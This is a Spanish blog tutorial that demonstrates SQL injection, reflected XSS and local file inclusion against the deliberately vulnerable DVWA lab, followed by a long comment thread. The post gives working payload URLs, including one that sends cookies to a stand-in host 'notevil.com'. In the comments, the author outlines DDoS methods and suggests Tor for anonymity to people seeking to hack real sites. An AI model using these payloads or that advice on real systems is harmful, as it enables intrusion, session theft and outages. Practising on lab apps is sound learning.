Las webs hoy en día son cada día mas seguras. ¿O no? Como intento demostrar frecuentemente en twitter, tal vez no sea asi.
Hay muchas herramientas hoy en día para encontrar vulnerabilidades en una web. Si una web utiliza una versión vieja de un CMS, cosa que podemos determinar utilizando una herramienta como Wappalizer o WhatWeb, la cuestión es mas sencilla. Es muy importante hoy en día mantener actualizado nuestro software. En caso contrario, un atacante podría buscar en el changelog de nuestro CMS todo lo referente a correcciones de vulnerabilidades en versiones posteriores a la que nosotros tenemos actualmente.
También hay otras herramientas para hackeear webs, pero yo hoy voy a optar por explicar que tipo de vulnerabilidades se pueden encontrar una web de una manera mas “artesanal”. Este artículo no plantea demostrar un tipo de vulnerabilidad nueva, ni pretende ser la demostración de un conocimiento muy avanzado. Simplemente es una explicación básica de algunos tipos de vulnerabilidades que pueden encontrarse en una web y como un atacante explotaría de ellas. Básicamente, se trata de:
- Inyecciones SQL
- Cross Site Scripting ( Javascript injection )
- Local file inclusion / Remote file inclusion
Para todos los ejemplos, usaremos código de Damn Vulnerable Web App. Te podés descargar esta aplicación para practicar los ejemplos que planteo acá. Todos los ejemplos estan hechos con la seguridad en low. Una vez instalado el app, andá a DVWA Security y elegí “low”.
Inyecciones SQL
Muy frecuentemente se piensa que a través de SQL solamente se puede obtener acceso a la base de datos. Esto generalmente es asi, pero SQL es un lenguaje muy versatil y nos permite hacer muchas cosas… entre ellas leer archivos en el disco duro. De todas maneras, el acceso a la base de datos es bastante catastrófico de por si. El código vulnerable se ve de esta manera:
<!--?php <br ?-->$id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
En este ejemplo, el código a ejecutarse se obtiene de algún parámetro de la URL, como ser
http://localhost/hack/vulnerabilities/sqli/?id=5
Esto es asi en muchas aplicaciones web, y todo esta perfecto siempre y cuando se filtre la información que envía el usuario. Al no estar escapado el input del usuario, si visitásemos esta URL, nos encontraríamos con la sorpresa de que nos muestra las passwords de los usuarios ( hasheadas con MD5, que puede ser roto fácilmente ).
http://localhost/hack/vulnerabilities/sqli/?id=1'+or+1+UNION+select+password+as+first_name,+user_id+from+users%23&Submit=Submit#
El hacer esto hace que la consulta que realicemos se transforme en
SELECT first_name, last_name FROM users WHERE user_id = ’1′ or 1 UNION select password as first_name, user_id from users#’
Aquellos que esten prestando atención se preguntaran como averigué que el campo password se llamaba password, como averigué que el campo user_id se llamaba user_id y cómo averigué que la tabla users se llamaba users. Es simple, como la web es mía y la instalé yo, miré en la base de datos :D
En caso que no podamos darnos ese gusto, hay que recurrir a técnicas mas complicadas… que se pueden encontrar en un link que recomendé antes en mi blog “SQL Injection Pocket Reference“. Lo que voy a hacer es preguntarle a mysql como se llaman las tablas:
http://localhost/hack/vulnerabilities/sqli/?id=5'+UNION+SELECT+table_name,+table_schema+FROM+information_schema.tables%23&Submit=Submit#
Al hacer eso la consulta se transforma en:
SELECT first_name, last_name FROM users WHERE user_id = ’5′ UNION SELECT table_name, table_schema FROM information_schema.tables#’
Lo que hace que la página nos muestre todas las tablas que existen en mysql, conjunto con que base de datos estan. En mi caso, en conjunto con muchas otras entradas que hay, aparece una que dice
ID: 5′ UNION SELECT table_name, table_schema FROM information_schema.tables#
First name: users
Surname: dvwa
Podemos hacer lo mismo para obtener las columnas:
http://localhost/hack/vulnerabilities/sqli/?id=5'+UNION+SELECT+column_name,+'xss'+FROM+information_schema.columns+WHERE+table_name+%3D+'users'%23&Submit=Submit#
Cross site scripting (XSS)
Cross site scripting es una vulnerabilidad que surge al recibir por algún medio información que luego va a ser incrustada en el HTML de nuestra página sin escaparla correctamente. Hay dos tipos de inyección XSS que podemos encontrar, a los que nos referimos en ingles, cómo reflected y stored. La primera se crea al modificar algún parámetro por get a algún valor que el administrador no esperó, y la segunda se genera al mostrar información previamente guardada en la base de datos.
Refiriendonos a la aplicación, el ejemplo que vemos como reflected sería una URL como esta:
http://localhost/hack/vulnerabilities/xss_r/?name=pedro
Con las vulnerabilidades de este tipo podemos hacer infinidad de cosas, entre las cuales está abusar la confianza que tiene el browser de el usuario con el sitio. La página web localhost, al navegarla por primera vez creó en mi browser una cookie que guarda toda la información sobre mi, un session id. Como podemos leer en este excelente artículo, esta es el único medio que tiene el server para diferenciar e identificar usuarios. Una vez obtenida la cookie de un usuario, podemos suplantar su identidad.
Normalmente esto es una tarea dificil, ya que el browser del usuario entrega esa información solamente al servidor correspondiente. Pero eso para nosotros no es problema, ¿No? Podemos ejecutar código javascript en él, asique por lo tanto el browser nos va a dar lo que no debería.
Para hacer que un usuario nos envíe sus cookies, debemos hacer que visite una URL como esta:
http://localhost/hack/vulnerabilities/xss_r/?name=%3Cscript%3Eajax+%3D+new+XMLHttpRequest();ajax.open('get',+'http://notevil.com/steal.php%3Fcookie%3D'+%2B+escape(document.cookie),+true);ajax.send(null);%3C/script%3E#
Es poco probable que un usuario clickée un enlace asi, pero si quieren ver uno que quizás clickée, clickeen aqui.
El stored XSS sigue la misma lógica, excepto que la información queda guardada en la base de datos.
File inclusion
El file inclusion lo podemos encontrar cuando una aplicación web incluye archivos basado en el input de un usuario. Hay dos tipos de file inclusion, el local file inclusion y el remote file inclusion. Como sus nombres indican, el local incluye archivos locales y el remote incluye archivos remotos, todo esto respecto al servidor.
En el caso de nuestra aplicación vulnerable, tenemos un LFI. ( podría ser un RFI también si tuviesemos configurado allow_url_include en nuestro PHP )
http://localhost/hack/vulnerabilities/fi/?page=include.php
A través de él tenemos acceso a todos los archivos a los que tenga acceso el usuario con el que se está corriendo apache. Por ejemplo /etc/hosts
http://localhost/hack/vulnerabilities/fi/?page=/etc/hosts
O el readme de la aplicación:
http://localhost/hack/vulnerabilities/fi/?page=../../README.txt
¡Espero que les haya gustado! Recuerden seguirme en twitter o suscribirse a este blog usando la opción el el menú de la izquierda para recibir mas artículos como este.
Un saludo,
Pedro
Roi dijo:
12/10/2011 a 7:33 PM
men m podrias enseñar lo k sabes sobre hackear sk kiero aprender pero no se nada
droope dijo:
13/10/2011 a 11:14 AM
¡Hola Roi!
Te mandé un mail ^ ^
Un abrazo
Bryan dijo:
13/10/2011 a 4:15 PM
me darías una mano con un localhos que tengo unas dudas???
droope dijo:
13/10/2011 a 5:47 PM
ohai bryan, te mandé un mail :D
Mariano dijo:
17/10/2011 a 3:10 AM
Quisiera saber como ejecutar por ejemplo el inyecciones SQL (Tengo 0 de programacion. Te agradezco
droope dijo:
17/10/2011 a 12:23 PM
Hola Mariano,
creo que puede ser que haga un tutorial mas específico con inyecciones SQL. Sin embargo, tendrías que aprender para que sirve el SQL y cómo se hacen las consultas SQL legítimas. ;)
Un abrazo grande,
Pedro
Carlos dijo:
23/10/2011 a 1:57 PM
Necesito que me ayudes para el hackeo de una web
droope dijo:
24/10/2011 a 10:55 AM
¡Hola Carlos!
Muchas gracias por tu comentario. :)
Un abrazo,
Pedro
gabriel dijo:
31/10/2011 a 4:06 PM
hOLA KAPO NECESITO SABER UNOS DATOS DE UNA WEB RESPONDEME Saludos
droope dijo:
31/10/2011 a 5:51 PM
buenas buenas! Ahí te mandé un mail
Cris dijo:
23/11/2011 a 3:23 PM
hola..fijate que deseo saturara una pagina web para dejarla en desuso no se si me puedas ayudar te lo agradeceria mucho..tengo solo un peque;o conocimiento sobre el comando “PING” si me podrias explicar otras tecnicas sencillas o utilizacion de programas para hackear…y recomendaciones para un buen hackeo…saludos
droope dijo:
24/11/2011 a 6:18 PM
Hola Cris.
Saturar una página web es una de las formas mas sencillas de tirar abajo un sitio web. Quizás debas aprender un poco de programación para crear tu propia botnet y de ahi en mas poder tirar sitios web que tengan menos banda ancha que tu botnet. Otra forma es encontrar vulnerabilidades en algún software que el servidor tenga instalado que te permita hacer un DDOS, o sinó la mas sencilla encontrar alguna parte de la aplicación web que requiera mucho procesamiento de parte del servidor. Una vez que la encuentras puedes repetir ese procesamiento realizando muchísimas peticiones hasta que se sature. :)
:)
de todas formas, para entretenerte te recomiendo hackthissite.org
carlos dijo:
25/11/2011 a 7:15 PM
hermano me podrias ayudar a hackear una red para modificarle unos datos, de verdad te lo agradeceria, espero tu respuesta a mi correo, muchas gracias, espero tu ayuda,gracias.
droope dijo:
26/11/2011 a 2:52 AM
hola carlos! la verdad que no tengo mucha experiencia con eso del hacking, te recomiendo que investigues el nmap de todas maneras. :)
Hector dijo:
28/11/2011 a 4:27 PM
Hola necesito que me ayudes a hackear esta pagina http://www.siiau.udg.mx
eh intentado pero no se bien como me podrias ayudar me urge gracias
te dejo mi correo the.boy.666@hotmail.com
droope dijo:
28/11/2011 a 9:06 PM
Hola hector!
Disculpame, no tomo ese tipo de trabajos… te puedo recomendar que hagas tus pruebas a través de tor, y que intentes ser lo mas anónimo posible.
Un abrazo,
Pedro
Hector dijo:
28/11/2011 a 9:17 PM
solo quiero borrar una materia, ya paso el periodo de registro y no quiero que me afecte…. no es para dañar la pagina, solo para no perjudicarme yo.
Me harias un gran favor
droope dijo:
28/11/2011 a 10:14 PM
Si, te entiendo… pero disculpame, ahora estoy con mil cosas y no puedo.
Hector dijo:
28/11/2011 a 10:35 PM
ok, igual muchas gracias
Markco dijo:
30/11/2011 a 7:47 PM
Tienes facebook o mail así te agrego?
droope dijo:
30/11/2011 a 9:17 PM
hola amigo te mandé un mail
jose dijo:
05/12/2011 a 3:31 AM
me podrias ayudar a conocer el usuario y contraseña de una pagina web??
droope dijo:
05/12/2011 a 8:14 PM
¡Hola!
Solo se puede saber el usuario y contraseña de una web si esta tiene alguna vulnerabilidad. Te recomiendo queaprendas mas sobre vulnerabilidades y como encontrarlas. Una vez que las encuentres puedes enviarme un comentario y yo te sigo ayudando.
Un saludo,
Pedro
cck dijo:
09/01/2012 a 3:59 AM
estemm me podrias tu mejorar calificaciones del siiau
cck dijo:
09/01/2012 a 4:00 AM
mi email es este skazy_up16@hotmail.com y ahi te doy mis datos del siiau
droope dijo:
21/01/2012 a 11:35 PM
No deberias ser tan abierto respecto a tus intenciones de hackear una pagina web :P no se que pensas vos.
Raúl dijo:
14/01/2012 a 2:35 PM
Hola amigo , me hechas una mano para hackear una web? Te dejo mi email: rmrayil@gmail.com
droope dijo:
21/01/2012 a 11:33 PM
Hola amigo!
Gracias por la propuesta! No suelo aceptar propuestas de ese tipo… disculpa. De todas maneras no se mucho de esas cosas yo ^^
Un abrazo,
Pedro
rafael dijo:
21/01/2012 a 6:23 AM
quiero hackear una pag escolar me dices como porfa
droope dijo:
21/01/2012 a 11:32 PM
Hola amigo!
No es tan sencillo como parece, te recomiendo que empiezes a aprender en hacktissite.org. Igualmente no se mucho…
Un abrazo,
Pedro
julio dijo:
22/01/2012 a 8:06 PM
nose el autor de este capitulo si me podria enseñar por favor mi facebook es julioallauca@hotmail.com
droope dijo:
03/02/2012 a 3:16 AM
Hola Julio,
Muchas gracias por comentar en mi Post! La verdad es que yo no sabria lo suficiente como para ense;ar a nadie… Disculpa.
Un abrazo,
Pedro
Luis dijo:
23/01/2012 a 12:51 PM
Pedro, no entiendo muy bien, podriamos encontrarnos en algun lado ? (web xD )
droope dijo:
03/02/2012 a 3:15 AM
Por supuesto! Nos vemos en hotmail.com a las 16 hs del martes.
Jaja, no, mentira! Cualquier cosa si me precisas, dejame un comentario pidiendome mi mail y veo como te puedo ayudar, dale?
Un abrazo,
Pedro
facuate dijo:
24/01/2012 a 1:30 AM
droope me ayudas a aprender a hackear enserio? quiero empezar per no entiendo mucho la verdad. te dejo mi email facuate@live.com
droope dijo:
03/02/2012 a 3:14 AM
Hola amigo, disculpa, no tendria tiempo para hacer una cosa asi. Te sugieor que de pronto visites hackthissite.org, ahi te van a ensenar y vas a aprender poco a poco.
Un abrazo,
Pedro
Camilo andres dijo:
25/01/2012 a 12:27 PM
Hola amigo me gustaria si depronto me pudiera ayudar a iniciarme como hacker y veo que usted sabe si depronto pudiera enviarme algun tutorial o manual sencillo para ir empezando.
Gracias por ayudar a educarnos con esta clase de material
droope dijo:
03/02/2012 a 3:13 AM
Hola amigo!
Perdona la demora, estoy a mil con muchas cosas y no encontre tiempo para contestarte. Yo para aprender arranque con hackthissite.org, te lo recomiendo.
Un abrazo,
Pedro
Jevo dijo:
31/01/2012 a 3:20 PM
Pago una cantidad considerable para que me hacking un web de una empresa…
droope dijo:
03/02/2012 a 3:13 AM
Hola amigo Jevo!
Lamentablemente no seria capaz de hacer algo similar… Te pido disculpas. Sin embargo, en vista de que es un tema delicado – y un poco bastante ilegal, digamos -, te sugiero que te comuniques por canales mas privados ( y usando encripcion )
Humildes saludos,
Pedro
SEBASTIAN dijo:
29/02/2012 a 6:06 PM
HERMANO QUIERO HACKEAR UNA WEB NECESITO AYUDA Y SI PODES ASESORARME TE AGRADECERIA SOY UN POCO INQUIETO CON ESTO
droope dijo:
03/03/2012 a 6:28 PM
Hola amigo,
Me puedes contactar por correo, avisame si te interesa. Pero de todas maneras he de decirte que estoy bastante ocupado y se me complicaria para ayudarte.
Un abrazo,
Pedro
Compilado de enlaces « programacion@droope dijo:
06/03/2012 a 5:28 AM
[...] sera “Como hackear paginas web 2″, una segunda edicion de la ya conocida “Como hackear paginas web ( en serio ))”, que me esta trayendo 55 visitas todos los [...]
A+ dijo:
06/03/2012 a 4:15 PM
Quisiera que me ayudaras con algo sobre programacion mandame un mail
droope dijo:
07/03/2012 a 5:02 AM
Hola amigo te pido disculpas, apenas tengo tiempo para moderar el blog :)
Skapunk1010 dijo:
26/03/2012 a 7:17 PM
Quisiera saber la mayoria de lo que sabes, dime en donde me alimento de informacion por favor y si tienes documentos, pdf, videos, lo que sea que sirva, pasalos porfavor… Te lo agradeceré demasiado !
droope dijo:
29/03/2012 a 9:01 PM
Hola amigo!
Hay muchisima informacion online, realmente, y comprendo como es que llegas a saturarte. Esta mismisima pagina web es un ejemplo de vulnerabilidades potenciales que podrian existir en una pagina web. Para aprender a utilizarlos vas a tener que esperar a que libere la proxima version.
Un abrazo,
Pedro
TheHacker01 dijo:
27/03/2012 a 8:00 PM
Hola, yo quiero saber dónde puedo aprender las diferentes formas de entrar a una web y modificarla o borrar archivos, algo así como un curso online.
Es que quiero intentar hackear mi propia web y ver como hago para que no tenga vulnerabilidades, además el otro día entré a un sitio que era copia de taringa y vi que solo tenía un mensaje, algo así como “Esta web fue hackeada por [Acá tenía un nombre] , esto les pasa por meterse con [Acá tenía el link de otra página web copia de taringa]” Y quisiera saber dónde aprender a hacer cosas así.
droope dijo:
29/03/2012 a 9:00 PM
Hola amigo,
Gracias por el comentario! Si quieres un curso online hackthissite.org se precia de ser un entrenamiento de hackers underground, pero no se si sera algo parecido a lo que tu necesitas.
Un abrazo,
Pedro
bry@n dijo:
02/05/2012 a 8:18 PM
yo tengo un curso de hackeo completo…inscribite y avisa a los demas en bryam.hazblog.com y les dejare cualquier programa que me pidan….
alfredo dijo:
29/03/2012 a 6:52 PM
me enseñas lo elemental para hackear una web pequeña por fa te lo agradesco mucho
droope dijo:
29/03/2012 a 8:59 PM
Hola amigo,
Hackear una pagina web es igual de sencillo o complicado independientemente de su tamano, y creo que si no sabes nada sera bastante complicado. Por lo pronto, te recomiendo que sigas insistiendo. Para el tiempo en el que aprendas como se hace ya no te va a interesar hacerlo, pero igual valdra la pena.
Un abrazo,
Pedro
gonzalo dijo:
03/04/2012 a 12:36 PM
hey solo kiero saber si me puedes ayudar a encontrar debilidades de sitios joomla y wordpress, agradeceria mucho tu ayuda
Saludos
droope dijo:
11/04/2012 a 7:17 AM
Hola amigo,
No presto esos servicios, pero si los prestase seguramente cobraria mucho mucho dinero :P
Un abrazo,
Pedro
yangel809 dijo:
03/04/2012 a 6:54 PM
Hola pana como estas me gusto mucho tu blog estare visitando muy a menudo
mira la verdad es que no se mucho sobre esto me gustaria que me enseñaras algo solo por aprender no para nada malo te puedo dejar mi correo asi me agregas
emil_jangel809@hotmail.com
droope dijo:
11/04/2012 a 7:16 AM
Gracias amigo!
Tus comentarios y sus visitas me inspiran a seguir publicando cosas, muchisimas gracias.
Un abrazo,
Pedro
yangel809 dijo:
03/04/2012 a 6:57 PM
hola pana como estas me podrias ayudar un poco de como hackear una web con ataques DDoS ya que me interesa mucho esto pero la verdad es que nose nada solo tengo una web bien completa pero nose nada en adsoluto sobre el hackeo de DDoS nose si es con mi hosting que realizaria las consultas etc…
ayudame un poquito porfavor
droope dijo:
11/04/2012 a 7:15 AM
Hola amigo!
Por supuesto! Solo tienes que seguir intentando y perseverar, seguro que lo vas a lograr con tiempo. :)
Un abrazo,
Pedro
yangel809 dijo:
11/04/2012 a 7:24 PM
Si pero ayudame como hacerlo xD
por que la verdad nose como empesar por ejemplo dime un tuto de que debo hacer como por ejemplo si quiero hackear mi propia web que es este foro
sexyplanet.com.ar
saludos
anon dijo:
06/04/2012 a 12:15 PM
se pueden hackear paginas publicas bastante seguras con estos modos?
droope dijo:
11/04/2012 a 7:15 AM
Hay dos respuestas para tu pregunta, una larga y una corta:
La corta: si
La larga: depende.
Christian dijo:
10/04/2012 a 2:08 AM
oye amigo quisiera que me ayudaras pues en 2 cosas primero aprender
a hackear siempre e estado interesado y segundo ayudarme a recuperar mi localhost me lo hackeron y no se recuperarlo
droope dijo:
11/04/2012 a 7:14 AM
Hola amigo,
No entiendo muy bien a que te referis. Me estas diciendo que hackearon tu xampp? No estoy muy seguro. Si esta en tu computadora, deberias tener muchas formas de recuperar el control ;)
Un abrazo,
Pedro
yangel809 dijo:
11/04/2012 a 7:22 PM
Hola de nuevo amigo como estas….
solo queria preguntarte de nuevo….
enséñame por favor como hackear una web o pasame un tutorial donde tenga todo explicado por ejemplo
para hacer un ataque DDoS debes dirigirte a tal sitio hacer clic en tal cosa etc… se que me entiendes por favor es solo para aprender
saludos y gracias
droope dijo:
12/04/2012 a 6:31 AM
Hola amigo,
El problema es que no hay un manual paso a paso. Por ejemplo, para hacer un ataque DDOS tienes 2 posibilidades:
1) Tener muchos mas recursos ( Banda ancha / procesador / memoria ) que el servidor en cuestion que piensas atacar. Si atacas un servidor que tiene una coneccion de – por ejemplo – 100 GB con una botnet que tiene una capacidad de transeferencia de – digamos – 1000 GB, probablemente en servidor se saturaria mientras dure el ataque y no pueda responder al trafico legitimo.
2) Encontrar alguna peticion que consuma muchos recursos. Por ejemplo, si encuentras una peticion en el servidor remoto que tenga que hacer muchos pedidos a la base de datos, al repetirla 10.000 veces el servidor se saturara y probablemente algo malo pase ( el sistema se quede sin memoria, el proceso crashee, etc. )
Comprendes? Lo unico que tienes que lograr es eso. El problema, claro esta, que no es tan sencillo.
Un abrazo,
Pedro
anonimo dijo:
16/04/2012 a 1:19 AM
porfavor quiero saber hackear enseñame!!!
droope dijo:
16/04/2012 a 8:05 PM
Hola amigo!
gracias por tu comentario. Me encantaria ayudarte, pero no creo que sepa lo suficiente como para hacerlo :(
Melissa dijo:
16/04/2012 a 4:35 PM
Hola, me llamo Melissa, estoy buscando una manera de hackear una pagina por un problema urgente y grave q tengo, no se si me podrias ayudar, estoy algo desesperada, gracias
droope dijo:
16/04/2012 a 8:04 PM
Hola Melisa!
Comprendo tu situacion, pero lamentablemente no hay nada que pueda hacer para ayudarte, yo tambien soy bastante novato en todo esto. :)
Un abrazo,
Pedro
sebastian dijo:
22/04/2012 a 11:09 AM
hey ola me podrian enseñar a como ser un hacker es que no se nada de eso por favvoorr !!??
droope dijo:
23/04/2012 a 11:05 PM
Hola amigo!
Es muy preferible que aprendas a programar algo. :)
Mucho mas divertido.
Un abrazo,
Pedro
CmdThOR dijo:
29/04/2012 a 12:31 AM
jajajaja viendo los comentarios me doy cuenta que hay muchos lammers que piensan que van a encontrar un software que solo diga pagina a hackear y comensar hackeo jajajaja tontos o algo peor que programar es solo teclear nombre de programa jajaja primero aprenda a usar su pc en modo consola despues programación c++, php y traten de aprender la mayoria de los lenguajes de programación ;)
droope dijo:
01/05/2012 a 12:11 AM
Tranquilo amigo! Esta todo bien. No me molesta.
rafael new dijo:
02/05/2012 a 2:17 AM
hola saves a mi me gusta esto y mucho y si me puedes ayudar
alguna pagina para aprender algo de hack porfa,
bueno adios !
droope dijo:
02/05/2012 a 4:13 AM
Hola amigo,
yo no se mucho, pero en hackthissite.org es donde aprendi todo lo que se.
anonimo... dijo:
02/05/2012 a 8:12 PM
me parece que la explicacion seria un poco mas sencilla para los que aun no saben como dejarles un programa o simplemente este truco les da hackeando:
( javascript:document.body.contentEditable =’true’;
document.designMode=’on’; void 0 )
despues de cargar la paina lo ponen borrando el link de la pagina y listo modificas lo que quieras borras y escribes….jajajaj
droope dijo:
10/05/2012 a 7:15 PM
It’s something!
bry@n dijo:
02/05/2012 a 8:15 PM
inscribanse en mi blog que es bryam.hazblog.com
y les dejare los links con cualquier programa solo inscribanse y me piden les subo cualquier programa …… gratiss…..
fdsfds dijo:
11/05/2012 a 9:32 PM
manga de putos porque no se dejan de boludear y se ponen a trabajar, son la lacra de esta sociedad, y se piensan que son unos grandes, grandes pelotudos son, pierden el tiempo en esto y lo mas lindo es que no logran hackear nada, solo entorpecen un poco cuando pueden, eso no sirve, entra a una base de datos y borra todo, demostralo boludon
Ddfff dijo:
15/05/2012 a 2:01 PM
Manga de inversiones si ese tal Pedro no sabe nada.
droope dijo:
15/05/2012 a 7:48 PM
es cierto!
wellington dijo:
19/05/2012 a 3:19 PM
te agradesco men por esa publicacion pues estoy apunto de comprar una tablet en la wed y si me estafan pues sabre que hacer con tal sitio un saludo men
Monda dijo:
20/05/2012 a 1:24 AM
alert(‘Es vulnerable’)
droope dijo:
25/05/2012 a 2:25 AM
ja ja ja :D wordpress.com no es vulnerable! tiene millones de usuarios a lo largo del mundo ^^ alguien seguro lo ha intentado antes que tu
Monda dijo:
20/05/2012 a 1:30 AM
CARLOS MRO dijo:
20/05/2012 a 4:39 PM
HOLA
AMIGOS YO SE UN POCO SOBRE EL TEMA PODRA AYUDARLOS ME ENCUENTRAN AQUI EN MI FACEBOOK:PONQUI-LOMAXIMO@HOTMAIL.COM
ronald pedro dijo:
22/05/2012 a 11:31 AM
Hummmm Ola :D Amigo nose si me puedas ayudar a sakar infomacion privada de un mu Bueno espero tu respuesta =)
droope dijo:
25/05/2012 a 2:25 AM
Hola!
No :(
mathias dijo:
31/05/2012 a 4:25 PM
hola pedro.! nesecito que me guies con algunas dudas que tengo sobre hack de paginas agregame al msn asi chateamos si te parece
droope dijo:
04/06/2012 a 8:38 PM
Hola amigo,
Si tienes muchisimo, muchisimo interes me puedes mandar un mail!
Abrazos,
Pedro
ractaazeroz dijo:
02/06/2012 a 4:42 AM
hola amigo me enseñarias a hachear web es que leei el post pero igual el 50% de lo que dice quede WTF?…XD
droope dijo:
04/06/2012 a 8:38 PM
Hola amigo,
Eso es probablemente porque te serviria tener un fundamento, principalmente en como escribir consultas SQL. Probablemente te sea conveniente aprender a programar en PHP y aprender MySQL. ;)
Un abrazo,
Pedro